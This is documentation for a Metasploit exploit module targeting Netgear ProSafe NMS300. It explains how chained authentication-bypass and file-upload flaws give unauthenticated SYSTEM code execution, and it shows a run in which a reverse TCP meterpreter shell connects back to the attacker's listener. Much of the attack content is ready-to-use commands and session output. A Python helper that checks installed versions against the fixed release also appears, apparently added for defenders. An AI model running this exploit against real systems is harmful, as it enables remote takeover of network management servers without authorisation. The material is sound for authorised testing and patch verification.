Vulnerable Application
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has multiple vulnerabilities that allow an unauthenticated remote
attacker to execute code as the SYSTEM user. The vulnerabilities include authentication bypass,
SQL injection, arbitrary file upload, and privilege escalation across various versions.
This module is able to spawn a meterpreter session by chaining together two specific
vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.7.0.12, and 1.7.0.1.
Note: The module should also work against version 1.1.0.13, but this was not tested.
Testing
To install the vulnerable version, follow the steps below:
- Download the installer for versions below v1.7.0.22.
- Follow the installation steps.
After these steps the ProSAFE NMS web panel will be exposed at http://localhost:8080/.
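For inventory work, the version threshold above (installers below v1.7.0.22) is the fact a defender needs; the following is an added example, not part of the module documentation, that classifies version strings against that threshold. It compares segments numerically so that a version such as a constructed 1.10.0.1 is not mis-sorted below 1.7.x by plain string comparison; the function names and the "1.10.0.1" sample are assumptions.

```python
"""Added example (not from the module docs): classify an installed NMS300
version against the v1.7.0.22 threshold named in the Testing section.
Naive string comparison gets "1.10.0.1" vs "1.7.0.22" wrong (a constructed
sample), so versions are compared as integer tuples. The threshold and the
tested-version list come from the page; the helper names are my own."""
from __future__ import annotations

FIXED_VERSION = "1.7.0.22"  # from the page: installers below this are vulnerable
# Versions the page says the module was tested against, and the untested note.
TESTED_VERSIONS = {"1.5.0.2", "1.4.0.17", "1.7.0.12", "1.7.0.1"}
UNTESTED_BUT_EXPECTED = {"1.1.0.13"}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '1.7.0.12' (optionally with a leading 'v') into (1, 7, 0, 12).
    Raises ValueError on anything that is not dotted integers."""
    text = text.strip().lower().lstrip("v")
    parts = text.split(".")
    if not parts or any(not p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def version_lt(a: str, b: str) -> bool:
    """True if version a sorts before version b, numerically per segment.
    Missing trailing segments are treated as 0, so 1.7 == 1.7.0.0."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    ta += (0,) * (width - len(ta))
    tb += (0,) * (width - len(tb))
    return ta < tb


def assess(installed: str) -> str:
    """Classify an inventory version string relative to the fixed version."""
    if not version_lt(installed, FIXED_VERSION):
        return "not-affected"
    plain = installed.strip().lstrip("vV")
    if plain in TESTED_VERSIONS:
        return "vulnerable-tested"
    if plain in UNTESTED_BUT_EXPECTED:
        return "vulnerable-untested"
    return "vulnerable-below-fix"


if __name__ == "__main__":
    for v in ["1.7.0.12", "v1.10.0.1", "1.7.0.22", "1.1.0.13", "1.7"]:
        print(v, "->", assess(v))
```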
Verification Steps
- Start msfconsole
- Do: use exploit/windows/http/netgear_nms_rce
- Do: set RHOST [IP]
- Do: set RPORT [PORT]
- Do: exploit
Options
Scenarios
msf6 > use exploit/windows/http/netgear_nms_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(windows/http/netgear_nms_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.104:8080 - Uploading payload...
[+] 192.168.56.104:8080 - Payload uploaded successfully
[*] 192.168.56.104:8080 - Executing payload...
[*] Sending stage (175686 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >